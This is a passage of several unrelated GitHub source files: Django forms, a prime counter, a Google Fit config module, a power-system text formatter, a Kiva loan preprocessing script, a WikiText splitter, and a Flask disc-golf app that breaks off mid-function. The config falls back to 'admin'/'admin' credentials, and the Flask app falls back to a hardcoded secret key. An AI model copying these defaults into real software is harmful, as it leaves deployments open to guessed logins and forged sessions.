+{"seq_id":"11134001730","text":"from django.contrib.auth.forms import AuthenticationForm, UserChangeForm\nfrom .models import EPS, CustomUser, TipoUsuario, InfoMiembros, TipoDocumento, EstadoCivil, RegimenSeguridad, Sexo, Etnia\nfrom django import forms\nfrom django.utils.html import format_html\n\n\nclass FiltroUsuarios(forms.Form):\n nombre = forms.CharField(\n required=False,\n widget=forms.TextInput(attrs={'class': 'form-control'})\n )\n id_usuario = forms.IntegerField(\n required=False,\n widget=forms.NumberInput(attrs={'class': 'form-control'})\n )\n documento_usuario = forms.CharField(\n max_length=20,\n required=False,\n widget=forms.TextInput(attrs={'class': 'form-control'})\n )\n\nclass FiltroPacientes(forms.Form):\n nombre = forms.CharField(\n required=False,\n widget=forms.TextInput(attrs={'class': 'form-control'})\n )\n documento_paciente = forms.CharField(\n max_length=20,\n required=False,\n widget=forms.TextInput(attrs={'class': 'form-control'})\n )\n\n \n \n\nclass FiltroLlamadasForm(forms.Form):\n id_llamada = forms.IntegerField(\n required=False,\n widget=forms.NumberInput(attrs={'class': 'form-control'})\n )\n \n id_profesional = forms.IntegerField(\n required=False,\n widget=forms.NumberInput(attrs={'class': 'form-control '})\n )\n \n documento_paciente = forms.CharField(\n max_length=20,\n required=False,\n widget=forms.TextInput(attrs={'class': 'form-control'})\n )\n \n fecha_llamada = forms.DateField(\n required=False,\n widget=forms.DateInput(attrs={'type': 'date', 'class': 'form-control'})\n )\n \n solo_hechas_por_mi = forms.BooleanField(\n required=False,\n widget=forms.CheckboxInput(attrs={'class': 'form-check-input'})\n )\n\nclass FiltroCitasForm(forms.Form):\n id_cita = forms.IntegerField(\n required=False,\n widget=forms.NumberInput(attrs={'class': 'form-control'})\n )\n \n id_profesional = forms.IntegerField(\n required=False,\n widget=forms.NumberInput(attrs={'class': 'form-control '})\n )\n documento_paciente = forms.CharField(\n max_length=20,\n required=False,\n widget=forms.TextInput(attrs={'class': 'form-control'})\n )\n fecha_cita = forms.DateField(\n required=False,\n widget=forms.DateInput(attrs={'type': 'date', 'class': 'form-control'})\n )\n solo_hechas_por_mi = forms.BooleanField(\n required=False,\n widget=forms.CheckboxInput(attrs={'class': 'form-check-input'})\n )\n\nclass CustomUserRegistrationForm(forms.ModelForm):\n username = forms.CharField(\n label='Nombre de usuario',\n widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Nombre de usuario'})\n )\n email = forms.EmailField(\n label='Correo electrónico',\n widget=forms.EmailInput(attrs={'class': 'form-control', 'placeholder': 'Correo electrónico'})\n )\n password = forms.CharField(\n label='Contraseña',\n widget=forms.PasswordInput(attrs={'class': 'form-control', 'placeholder': 'Contraseña'})\n )\n password2 = forms.CharField(\n label='Confirmar contraseña',\n widget=forms.PasswordInput(attrs={'class': 'form-control', 'placeholder': 'Confirmar contraseña'})\n )\n tipo_usuario = forms.ModelChoiceField(\n label='Seleccione tipo de usuario',\n queryset=TipoUsuario.objects.all(),\n widget=forms.Select(attrs={'class': 'custom-class form-select', 'id': 'custom-id'}),\n empty_label='Selecciona un tipo de usuario'\n )\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.fields['password2'].label = 'Confirmar contraseña'\n\n class Meta:\n model = CustomUser\n fields = ('username', 'email', 'password', 'password2', 'tipo_usuario')\n\n\n\nclass 
AutodataForm(forms.ModelForm):\n tipo_documento = forms.ModelChoiceField(\n queryset=TipoDocumento.objects.all(),\n widget=forms.Select(attrs={\n 'class': 'form-select',\n 'id': 'id_tipo_documento'\n }),\n empty_label=\"Selecciona tu tipo de documento\"\n )\n estado_civil = forms.ModelChoiceField(\n queryset=EstadoCivil.objects.all(),\n widget=forms.Select(attrs={\n 'class': 'form-select',\n 'id': 'id_estado_civil'\n }),\n empty_label=\"Selecciona tu estado civil\"\n )\n regimen_seguridad = forms.ModelChoiceField(\n queryset=RegimenSeguridad.objects.all(),\n widget=forms.Select(attrs={\n 'class': 'form-select',\n 'id': 'id_regimen_seguridad'\n }),\n empty_label=\"Selecciona tu régimen de seguridad\"\n )\n sexo = forms.ModelChoiceField(\n queryset=Sexo.objects.all(),\n widget=forms.Select(attrs={\n 'class': 'form-select',\n 'id': 'id_sexo'\n }),\n empty_label=\"Selecciona tu sexo\"\n )\n etnia = forms.ModelChoiceField(\n queryset=Etnia.objects.all(),\n widget=forms.Select(attrs={\n 'class': 'form-select',\n 'id': 'id_etnia'\n }),\n empty_label=\"Selecciona tu Etnia\"\n )\n eps = forms.ModelChoiceField(\n queryset=EPS.objects.all(),\n widget=forms.Select(attrs={'class': 'form-select', 'id': 'id_nombre_eps'})\n )\n\n # Agregar campos restantes con estilos Bootstrap\n nombre = forms.CharField(widget=forms.TextInput(attrs={'class': 'form-control', 'id': 'id_nombre'}))\n documento = forms.CharField(widget=forms.TextInput(attrs={'class': 'form-control', 'id': 'id_documento'}))\n numero_hijos = forms.IntegerField(widget=forms.NumberInput(attrs={'class': 'form-control', 'id': 'id_numero_hijos'}))\n direccion = forms.CharField(widget=forms.TextInput(attrs={'class': 'form-control', 'id': 'id_direccion'}))\n barrio = forms.CharField(widget=forms.TextInput(attrs={'class': 'form-control', 'id': 'id_barrio'}))\n celular = forms.CharField(widget=forms.TextInput(attrs={'class': 'form-control', 'id': 'id_celular'}))\n sisben = forms.BooleanField(widget=forms.CheckboxInput(attrs={'class': 'form-check-input', 'id':'sisben'}),\n required=False)\n class Meta:\n model = InfoMiembros\n fields = ('nombre', 'tipo_documento', 'documento', 'estado_civil', 'numero_hijos', 'etnia',\n 'direccion', 'barrio', 'celular', 'sisben', 'eps', 'regimen_seguridad', 'sexo',)\n\n\nclass CustomUserLoginForm(AuthenticationForm):\n username = forms.CharField(\n widget=forms.TextInput(attrs={'class': 'form-control'}))\n password = forms.CharField(\n widget=forms.PasswordInput(attrs={'class': 'form-control'}))\n\n","repo_name":"DavidMojicaDev/T3","sub_path":"main/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":6745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"9707497421","text":"# !usr/bin/env python3\r\n\r\n\"\"\"Counts the number of primes from 2 to a user-specified limit.\r\nA number is considered prime if it is greater than or equal to 2,\r\nand its only factors are 1 and itself.\r\n\"\"\"\r\n\r\nimport cProfile\r\nimport pstats\r\nfrom math import isqrt\r\n\r\n\r\ndef count_primes(limit: int) -> int:\r\n \"\"\"Returns the number of primes from 2 to the limit specified.\"\"\"\r\n primes = set(range(3, limit + 1, 2))\r\n for i in range(3, isqrt(limit) + 1, 2):\r\n if i in primes:\r\n primes.difference_update(range(i ** 2, limit + 1, i))\r\n return len(primes) + 1\r\n\r\n\r\ndef main(n: int = 100_000) -> None:\r\n with cProfile.Profile() as pr:\r\n print(count_primes(n))\r\n pr.print_stats(pstats.SortKey.TIME)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main(250_000)\r\n","repo_name":"siddsp02/Prime-Counter","sub_path":"primes.py","file_name":"primes.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"31239419502","text":"#!/usr/bin/python\nimport os\nimport uuid\n\nDEBUG = True\nGOOGLE_OAUTH2_CLIENT_ID = os.environ.get('GOOGLE_OAUTH2_CLIENT_ID', 'not found')\nAUTH_URI = os.environ.get('AUTH_URI', 'not found')\nTOKEN_URI = os.environ.get('TOKEN_URI', 'not found')\nGOOGLE_OAUTH2_CLIENT_SECRET = os.environ.get('GOOGLE_OAUTH2_CLIENT_SECRET', 'not found')\nREDIRECT_URIS = os.environ.get('REDIRECT_URIS', 'not found')\nJAVASCRIPT_ORIGINS = os.environ.get('JAVASCRIPT_ORIGINS', 'not found')\nAPPLICATION_NAME = os.environ.get('APP_NAME', 'refit')\nUSERNAME = os.environ.get('USERNAME', 'admin')\nPASSWORD = os.environ.get('PASSWORD', 'admin')\nSECRET_KEY = os.environ.get('SECRET_KEY', str(uuid.uuid4()))\nHOST = os.environ.get('HOST', '0.0.0.0')\nPORT = int(os.environ.get('PORT', 5000))\nGOOGLE_FIT_SCOPES = ['https://www.googleapis.com/auth/fitness.body.read',\n 'https://www.googleapis.com/auth/fitness.activity.read', 'https://www.googleapis.com/auth/fitness.activity.read', 'https://www.googleapis.com/auth/drive.metadata.readonly']\nDATA_SOURCE_ID_CAL1 = 'derived:com.google.calories.bmr:com.google.android.gms:from_height&weight'\nDATA_SOURCE_ID_CAL2 = 'derived:com.google.calories.bmr:com.google.android.gms:merged'\nDATA_SOURCE_ID_STEPS = 'derived:com.google.step_count.delta:com.google.android.gms:estimated_steps'\nDATA_SOURCE_ID_WEIGHT_USER_INPUT = 'raw:com.google.height:com.google.android.apps.fitness:user_input'\nDATA_SOURCE_ID_HR = 'derived:com.google.heart_rate.bpm:com.google.android.gms:merge_heart_rate_bpm'\nDATA_SOURCE_ID_SLEEP = 'raw:com.google.activity.segment:com.mc.miband1:'\nDATA_SOURCE_ID_WEIGHT_MERGE = 'derived:com.google.weight:com.google.android.gms:merge_weight'\n","repo_name":"cnheider/refit","sub_path":"refit/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"30955038084","text":"\"\"\"\nOutput TXT file formatter.\n\"\"\"\n\nimport os\nfrom typing import Iterable\n\nfrom andes.shared import np\n\n\ndef dump_data(text, header, rowname, data, file, width=18, precision=5):\n out = ''\n\n os.makedirs(os.path.abspath(os.path.dirname(file)), exist_ok=True)\n with open(file, 'w') as fid:\n\n for Text, Header, Rowname, Data in zip(text, header, rowname, data):\n # Write Text\n if Text:\n fid.writelines(Text)\n\n # determine the width for the first column (usually names)\n width_first = width\n if isinstance(Rowname, Iterable) and len(Rowname) > 0:\n for item in Rowname:\n if isinstance(item, Iterable) and len(item) > width_first:\n width_first = len(item)\n\n # Write Header\n if Header:\n ncol = len(Header)\n s = ' ' * width_first\n s += '{:>{width}s}' * ncol + '\\n'\n fid.writelines(s.format(*Header, width=width))\n fid.write('\\n')\n\n # Append Rowname to Data\n # Data is a list of column lists\n if Rowname is not None:\n ncol = 0\n for idx, item in enumerate(Rowname): # write by row as always\n if Data is None:\n out = ''\n elif isinstance(Data, (int, float, str)):\n out = [Data]\n elif isinstance(Data, (list, tuple, np.ndarray)):\n if isinstance(Data[0], (int, float)): # is a list of numbers\n out = [Data[idx]]\n elif isinstance(Data[0], (list, np.ndarray)): # list of list in Data\n ncol = len(Data)\n out = [Data[i][idx] for i in range(ncol)]\n else:\n print(Data)\n print('Unexpected Data during output, in formats/txt.py')\n\n s = '{:{width_first}s}' # for row header\n for ii, col in enumerate(out):\n if isinstance(col, (int, float)):\n s += '{:>{width}.{precision}g}'\n elif isinstance(col, str):\n if len(col) > width:\n out[ii] = col[:width]\n s += '{:>{width}s}'\n elif col is None:\n out[ii] = 'None'\n s += '{:>{width}s}'\n else:\n pass\n s += '\\n'\n\n fid.write(\n s.format(\n str(item), *out, width_first=width_first, width=width, precision=precision))\n fid.write('\\n')\n","repo_name":"CURENT/andes","sub_path":"andes/io/txt.py","file_name":"txt.py","file_ext":"py","file_size_in_byte":2869,"program_lang":"python","lang":"en","doc_type":"code","stars":178,"dataset":"github-code","pt":"18"}
+{"seq_id":"2543922516","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu May 24 12:08:16 2018\r\n\r\n@author: Sandman\r\n\"\"\"\r\n\r\n# kiva_loans.csv file contains comma (,) in the column field value due to this Pyspark CSV reader package is unable to read data correctly\r\n\r\n# Thus, first load the data using the python pandas library and select the appropriate columns, handle the missing values and create new Spark data from Pandas dataframe\r\n\r\n# Operations are as below\r\n# Input File\r\n#kiva_loans.csv -- (id,funded_amount,loan_amount,activity,sector,use,country_code,country,region,currency,partner_id,posted_time,disbursed_time,funded_time,term_in_months,lender_count,tags,borrower_genders,repayment_interval,date)\r\n\r\n# output File in gunzip format\r\n# /user/sahilbhange/output/kiva/formated_output/part-00000.gz\r\n#(id,funded_amount,loan_amount,activity,sector,country,region,currency,partner_id,posted_time,disbursed_time,term_in_months,lender_count,borrower_genders,repayment_interval,date)\r\n\r\n# Spark parameter setting for execution\r\n\r\n# spark-submit --master yarn --conf spark.ui.port=12789 --num-executors 6 --executor-cores 3 --executor-memory 1G src/main/python/kiva_code/kiva_loans_data_preprocessing.py\r\n\r\n\r\nimport pandas as pd\r\nfrom pyspark import SparkConf, SparkContext\r\nfrom pyspark.sql import SQLContext\r\n#from pyspark.sql import *\r\n#from pyspark.sql.functions import *\r\n\r\nconf=SparkConf().setAppName(\"kiva-loan-file-cleaning\").setMaster(\"yarn-client\")\r\n\r\nsc = SparkContext(conf=conf)\r\n\r\nsqlContext = SQLContext(sc)\r\n\r\n# load csv file data using pandas\r\nkiva_loan_pdf=pd.read_csv(\"/home/sahilbhange/kiva_loan_data/kiva_loans.csv\", encoding='utf-8',delimiter=',')\r\n\r\n''' \r\n#pandas data pre-processing\r\n#Null values in borrower_genders column\r\n#>>> kiva_loan_pdf['borrower_genders'].isnull().sum()\r\n#4221\r\n\r\n#There are 4221 records with NULL value for field 'borrower_genders'\r\n#Thus default NULL value as \"NotAvailable\"\r\n'''\r\n\r\nkiva_loan_pdf['borrower_genders']=kiva_loan_pdf['borrower_genders'].fillna(\"NotAvailable\")\r\n'''\r\n# normalize the values in borrower_genders columns as below\r\n# male - male\r\n# female - female\r\n# if male and female - group \r\n'''\r\nkiva_loan_pdf['borrower_genders']=[elem if elem in ['female','male'] else 'group' for elem in kiva_loan_pdf['borrower_genders'] ]\r\n\r\n'''\r\n# There are 2396 records with NULL value for field 'disbursed_time'\r\n# thus default missing disbursed_time with '1900-01-01 00:00:00+00:00'\r\n# We can filter out default value records while querying the data\r\n#>>> kiva_loan_pdf['disbursed_time'].isnull().sum()\r\n#2396\r\n# Default the missing values for disbursed_time with '1900-01-01 00:00:00+00:00'\r\n'''\r\n\r\nkiva_loan_pdf['disbursed_time']=kiva_loan_pdf['disbursed_time'].fillna(\"1900-01-01 00:00:00+00:00\")\r\n\r\n'''\r\n#>>> kiva_loan_pdf['country_code'].isnull().sum()\r\n#8\r\n\r\n# 8 values for country_code field are NULL\r\n\r\n# Find the corresponding coutry for NULL country_code value\r\n#>>> kiva_loan_pdf[kiva_loan_pdf['country_code'].isnull()][['country','country_code']]\r\n# country country_code\r\n#202537 Namibia NaN\r\n\r\n# Country Namibia has null values for country field\r\n# Fill Namibia coutry code value as 'NA'\r\n'''\r\n\r\nkiva_loan_pdf['country_code']=kiva_loan_pdf['country_code'].fillna(\"NA\")\r\n\r\n# Select only required fields and create new pandas data frame\r\n# Exclude the country code in new file as coutry 
and country code give the same information\r\nkivaLoan_req_fields = kiva_loan_pdf[['id','funded_amount','loan_amount','activity','sector','country','currency','partner_id','posted_time','disbursed_time','term_in_months','lender_count','borrower_genders','repayment_interval','date']]\r\n\r\nsqlc=SQLContext(sc)\r\n\r\n# Convert Pandas dataframe to Spark data frame\r\nkivaLoan_SDF=sqlc.createDataFrame(kivaLoan_req_fields)\r\n\r\n\r\n# Save the Spark data frame with the required fields to HDFS in gzip format\r\n# Save in overwrite mode in case of rerun\r\nkivaLoan_SDF.repartition(1).write.format('com.databricks.spark.csv').option(\"codec\", \"org.apache.hadoop.io.compress.GzipCodec\").save('/user/sahilbhange/output/kiva/formated_output/',header = 'true',mode='overwrite')\r\n\r\n\r\n","repo_name":"sahilbhange/Kiva-Loan-Data-Warehouse","sub_path":"kiva_datapreprocessing/kiva_loans_data_preprocessing.py","file_name":"kiva_loans_data_preprocessing.py","file_ext":"py","file_size_in_byte":4101,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
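The normalization step in the record above collapses any `borrower_genders` value that is not exactly 'female' or 'male' into 'group'. The same idea on toy data, as a self-contained pandas sketch:

```python
import pandas as pd

df = pd.DataFrame(
    {"borrower_genders": ["female", "male", None, "female, female, male"]}
)

# Default missing values first, then collapse multi-borrower strings,
# mirroring the fillna + list comprehension in the record above.
df["borrower_genders"] = df["borrower_genders"].fillna("NotAvailable")
df["borrower_genders"] = [
    v if v in ("female", "male") else "group" for v in df["borrower_genders"]
]
print(df["borrower_genders"].tolist())  # ['female', 'male', 'group', 'group']
```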
+{"seq_id":"3210122533","text":"import argparse\nimport os\nimport re\n\n\ndef parameters():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--input_filename\", type=str, help=\"file to be sampled\") # 切分的文件路径\n parser.add_argument(\"--output_dir\", type=str) # 切分后的文件保存路径\n args = parser.parse_args()\n\n return args\n\n\n# filename = './wikitext-103-raw/wiki.test.raw'\n# output_dir = './wikitext-103-raw/shuffle'\n\n# 将文件按一级标题划分\ndef read_line(args):\n filename = args.input_filename\n output_dir = args.output_dir\n if not os.path.exists(output_dir):\n os.mkdir(output_dir)\n \n file = open(filename, \"r\", encoding=\"utf-8\") \n paragraph = []\n f_id, title_flag = 1, -1\n \n for line in file:\n tokens = line.strip().split(' ') \n if tokens[0] == \"=\" and tokens[-1] == \"=\" and tokens[1] != \"=\": # 判断是否是一级标题\n title_flag += 1\n \n if title_flag != 1:\n paragraph = open(output_dir+'/'+str(f_id)+'.raw', 'a') # 以写模式\"w\" open会造成覆盖,应该以追加模式\"a\"\n paragraph.writelines(line)\n paragraph.close()\n\n # 遇到新的一级标题,存储在新的文件\n elif title_flag == 1:\n # print(\"Paragraph file saved: \", f_id)\n f_id += 1\n title_flag = 0 \n paragraph = open(output_dir+'/'+str(f_id)+'.raw', 'a') \n paragraph.writelines(line)\n paragraph.close() \n print(\"--------------------\")\n print(\"Input: \", filename)\n print(\"Output: \", output_dir)\n print(\"Total processed: \", f_id, \"files.\")\n print(\"--------------------\")\n file.close()\n\nargs = parameters()\n\ndef main():\n read_line(args)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"YeLusin/FedBERT","sub_path":"split.py","file_name":"split.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"}
+{"seq_id":"35348975621","text":"import os\nfrom datetime import datetime\nfrom flask import Flask, request, render_template, redirect, flash, session, g, jsonify\nfrom models import db, connect_db, GroupRound, User, UserRound, Follows\nimport requests\nfrom sqlalchemy.exc import IntegrityError, InvalidRequestError\nfrom flask_debugtoolbar import DebugToolbarExtension\nfrom forms import LoginForm, RegisterForm, EditUser, NewRound\nfrom psycopg2.errors import UniqueViolation\nfrom secret.secret import API_KEY, NAME_SEARCH_SIG, ZIP_SEARCH_SIG, LOC_SEARCH_SIG, ID_SEARCH_SIG, PHOTO_SEARCH_SIG, HOLE_INFO_SIG\n\napp = Flask(__name__)\n\nACTIVE_USER = \"active_user_id\"\n\n\nAPI_URL = \"https://www.dgcoursereview.com/api_test/\"\n\n# app.config['API_KEY'] = os.environ.get('API_KEY')\n# app.config['NAME_SEARCH_SIG'] = os.environ.get(\n# 'NAME_SEARCH_SIG')\n# app.config['ZIP_SEARCH_SIG'] = os.environ.get('ZIP_SEARCH_SIG')\n# app.config['LOC_SEARCH_SIG '] = os.environ.get(\n# 'LOC_SEARCH_SIG')\n# app.config['ID_SEARCH_SIG'] = os.environ.get('ID_SEARCH_SIG')\n# app.config['PHOTO_SEARCH_SIG'] = os.environ.get(\n# 'PHOTO_SEARCH_SIG')\n# app.config['HOLE_INFO_SIG'] = os.environ.get('HOLE_INFO_SIG')\n\n\n#########################Local Stuff ##################################\n\napp.config['API_KEY'] = os.environ.get('API_KEY', API_KEY)\napp.config['NAME_SEARCH_SIG'] = os.environ.get(\n 'NAME_SEARCH_SIG', NAME_SEARCH_SIG)\napp.config['ZIP_SEARCH_SIG'] = os.environ.get('ZIP_SEARCH_SIG', ZIP_SEARCH_SIG)\napp.config['LOC_SEARCH_SIG '] = os.environ.get(\n 'LOC_SEARCH_SIG', LOC_SEARCH_SIG)\napp.config['ID_SEARCH_SIG'] = os.environ.get('ID_SEARCH_SIG', ID_SEARCH_SIG)\napp.config['PHOTO_SEARCH_SIG'] = os.environ.get(\n 'PHOTO_SEARCH_SIG', PHOTO_SEARCH_SIG)\napp.config['HOLE_INFO_SIG'] = os.environ.get('HOLE_INFO_SIG', HOLE_INFO_SIG)\n\n\n#####################################\n\napp.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get(\n 'DATABASE_URL', 'postgresql:///discgolf')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['SQLALCHEMY_ECHO'] = False\napp.config['SECRET_KEY'] = os.environ.get('SECRET_KEY', 'veryverysecret')\napp.config['DEBUG_TB_INTERCEPT_REDIRECTS'] = False\napp.debug = False\n\ndebug = DebugToolbarExtension(app)\n\n\nconnect_db(app)\n\n\n@app.before_request\ndef add_user_to_g():\n \"\"\"If we're logged in, add curr user to Flask global.\"\"\"\n\n if ACTIVE_USER in session:\n g.user = User.query.get(session[ACTIVE_USER])\n\n else:\n g.user = None\n\n\ndef user_login(user):\n \"\"\"Log in user\"\"\"\n session[ACTIVE_USER] = user.id\n\n\ndef user_logout():\n \"\"\"Log out user\"\"\"\n if ACTIVE_USER in session:\n del session[ACTIVE_USER]\n\n\ndef get_course_by_id(course_id):\n \"\"\"A call to the API to gather course information based on the course id\n returns a single JSON course response\"\"\"\n res = requests.get(f\"{API_URL}\", params={\n 'key': app.config['API_KEY'], 'mode': 'crseinfo', 'id': course_id, 'sig': app.config['ID_SEARCH_SIG']})\n if not res:\n return []\n\n return res.json()\n\n\ndef get_course_by_name(name):\n \"\"\"search the API for courses by name. Returns list of JSON objects\"\"\"\n res = requests.get(f\"{API_URL}\", params={\n 'key': app.config['API_KEY'], 'mode': 'findname', 'name': name, 'sig': app.config['NAME_SEARCH_SIG']})\n if not res:\n return []\n return res.json()\n\n\ndef get_hole_info(course_id):\n \"\"\"search hole information for selected course. 
Returns json list of holes and information\"\"\"\n res = requests.get(f\"{API_URL}\", params={\n 'key': app.config['API_KEY'], 'mode': \"holeinfo\", 'id': course_id, 'sig': app.config['HOLE_INFO_SIG']\n })\n if not res:\n return []\n return res.json()\n\n\ndef get_course_photo(course_id):\n \"\"\"retrieve a course photo from the API. Returns URL\"\"\"\n res = requests.get(f\"{API_URL}\", params={\n 'key': app.config['API_KEY'], 'mode': \"crsephto\", 'id': course_id, 'sig': app.config['PHOTO_SEARCH_SIG']\n })\n if not res:\n return None\n return res.json()['course_photo_url_medium']\n\n\ndef search_by_zip(zip):\n \"\"\"Searches API for courses close to zip. Returns list of JSON objects\"\"\"\n res = requests.get(f\"{API_URL}\", params={\n 'key': app.config['API_KEY'], 'mode': \"findzip\", 'zip': zip, 'sig': app.config['ZIP_SEARCH_SIG']\n })\n if not res:\n return []\n return res.json()\n\n\n@app.route('/')\ndef base():\n if g.user:\n return redirect('/home')\n return render_template('home.html')\n\n\n@app.route('/login', methods=[\"GET\", \"POST\"])\ndef login():\n \"\"\"Handles User Login\"\"\"\n\n form = LoginForm()\n if g.user:\n flash(\"Already logged in, log out to log in as different user\", \"warning\")\n return redirect('/')\n if form.validate_on_submit():\n user = User.authenticate(form.username.data,\n form.password.data)\n\n if user:\n user_login(user)\n flash(f\"Welcome back, {user.username}!\", \"success\")\n return redirect(\"/\")\n\n flash(\"Invalid login information\", \"danger\")\n\n return render_template('login.html', form=form)\n\n\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n \"\"\"page with form to register a new user\"\"\"\n form = RegisterForm()\n if g.user:\n flash(\"Already logged in, log out to register new user\", \"warning\")\n return redirect('/')\n\n if form.validate_on_submit():\n try:\n new_user = User.signup(\n username=form.username.data,\n first_name=form.first_name.data,\n last_name=form.last_name.data,\n email=form.email.data,\n password=form.password.data\n )\n db.session.commit()\n\n except:\n flash(\"Username or Email is already being used\", \"danger\")\n return render_template(\"register.html\", form=form)\n\n user_login(new_user)\n return redirect('/home')\n else:\n return render_template(\"register.html\", form=form)\n\n\n@app.route('/logout', methods=['POST'])\ndef logout_user():\n if not g.user:\n flash(\"Log in before you can log out!\", \"warning\")\n return redirect('/')\n user_logout()\n flash(\"Log out was successful!\", 'success')\n return redirect('/')\n\n\n@app.route('/home')\ndef home_page():\n \"\"\"landing page when the site is visited\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n rounds = UserRound.query.order_by(UserRound.date.desc()).all()\n\n return render_template('userhome.html', rounds=rounds)\n\n#######################################\n# Course Routes #\n\n\n@app.route('/course_details/<int:id>')\ndef show_course_details(id):\n \"\"\"Shows details of chosen course\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n rounds = UserRound.query.filter(\n UserRound.course_id == id).order_by(UserRound.date.desc()).all()\n try:\n course = get_course_by_id(id)\n holes = get_hole_info(id)\n except:\n flash(\"An error occurred, try again\", \"danger\")\n return redirect('/')\n return render_template('/course/course_home.html', course=course, rounds=rounds, holes=holes)\n\n\n# @app.route('/course_details/<int:id>/holes')\n# def 
show_hole_info(id):\n# if not g.user:\n# flash(\"Please Log in or Register!\", \"danger\")\n# return redirect('/')\n# course = get_course_by_id(id)\n# holes = get_hole_info(id)\n\n# return render_template('course/tee_info.html', holes=holes, course=course)\n\n\n####################################\n# User Routes #\n@app.route('/users/<int:id>')\ndef show_user_details(id):\n \"\"\"shows a user's details to another logged-in user. If the page is the logged-in user's own details, it can be edited.\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n user = User.query.get_or_404(id)\n following = [f.id for f in user.following]\n following_rounds = (UserRound.query.filter(UserRound.user_id.in_(following))\n .order_by(UserRound.date.desc())\n .all())\n return render_template('/user/user_details.html', user=user, following_rounds=following_rounds)\n\n\n@app.route('/users/<int:id>/rounds')\ndef show_user_rounds(id):\n \"\"\"Show user page with most recent rounds\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n user = User.query.get_or_404(id)\n return render_template('/user/user_rounds.html', user=user)\n\n\n@app.route('/users/<int:id>/following')\ndef show_user_follows(id):\n \"\"\"Show user page with all followed users\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n user = User.query.get_or_404(id)\n return render_template('/user/following.html', user=user)\n\n\n@app.route('/users/<int:id>/followers')\ndef show_user_followers(id):\n \"\"\"Show user page with all followers\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n user = User.query.get_or_404(id)\n return render_template('/user/followers.html', user=user)\n\n\n@app.route('/users/<int:id>/following_rounds')\ndef show_following_rounds(id):\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n user = User.query.get_or_404(id)\n following = [f.id for f in user.following]\n following_rounds = (UserRound.query.filter(UserRound.user_id.in_(following))\n .order_by(UserRound.date.desc())\n .all())\n return render_template('user/following_rounds.html', user=user, following_rounds=following_rounds)\n\n\n@app.route('/users/<int:id>/edit', methods=['GET', 'POST'])\ndef edit_user(id):\n \"\"\"Shows edit user page and submits changes to the DB\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n if g.user.id != id:\n flash(\"Unauthorized to edit user\", 'danger')\n return redirect('/')\n user = g.user\n form = EditUser(obj=user)\n if form.validate_on_submit():\n if User.authenticate(user.username, form.password.data):\n try:\n user.username = form.username.data\n user.first_name = form.first_name.data\n user.last_name = form.last_name.data\n user.email = form.email.data\n user.location = form.location.data\n user.bio = form.bio.data\n user.avatar = form.avatar.data\n user.fav_course = form.fav_course.data\n if user.fav_course:\n course = get_course_by_name(user.fav_course)\n if course:\n user.fav_course = course[0][\"name\"]\n db.session.commit()\n\n except (IntegrityError, InvalidRequestError, UniqueViolation):\n db.session.rollback()\n flash(\"Username or Email is already being used\", \"danger\")\n return render_template('user/edit_user.html', user=user, form=form)\n flash(\"Profile edited successfully!\", 'success')\n return redirect(f\"/users/{user.id}\")\n flash(\"Incorrect Password\", 'danger')\n return 
render_template('user/edit_user.html', user=user, form=form)\n else:\n return render_template('user/edit_user.html', user=user, form=form)\n\n\n@app.route('/users/<int:id>/delete', methods=['POST'])\ndef delete_user(id):\n \"\"\"Remove user\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n user = User.query.get_or_404(id)\n if user.id != g.user.id:\n flash(\"Cannot delete another user\", \"danger\")\n return redirect('/')\n db.session.delete(user)\n db.session.commit()\n flash('User successfully removed', \"success\")\n return redirect('/')\n\n\n@app.route('/course_details/<int:id>/new_round', methods=['GET', 'POST'])\ndef add_new_round(id):\n \"\"\"Adding a new round\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n form = NewRound()\n user = g.user\n\n course = get_course_by_id(id)\n if form.validate_on_submit():\n date = form.date.data\n score = form.score.data\n notes = form.notes.data\n user_id = user.id\n\n new_round = UserRound(user_id=user.id, course_id=course['course_id'],\n course_name=course['name'], date=date, score=score, notes=notes)\n db.session.add(new_round)\n try:\n db.session.commit()\n except:\n flash('Something went wrong, try again', 'danger')\n return render_template('course/new_round.html', form=form)\n flash('Round added successfully', 'success')\n return redirect(f'/course_details/{id}')\n else:\n return render_template('course/new_round.html', form=form, user=user, course=course)\n\n\n@app.route(\"/users/<int:id>/follow\", methods=['POST'])\ndef follow_user(id):\n \"\"\"Adding user to followed users\"\"\"\n if not g.user:\n flash(\"Please Log in or Register!\", \"danger\")\n return redirect('/')\n if g.user.id == id:\n flash(\"Following yourself is a little vain, don't you think?\", \"warning\")\n return redirect('/')\n\n followed_user = User.query.get_or_404(id)\n 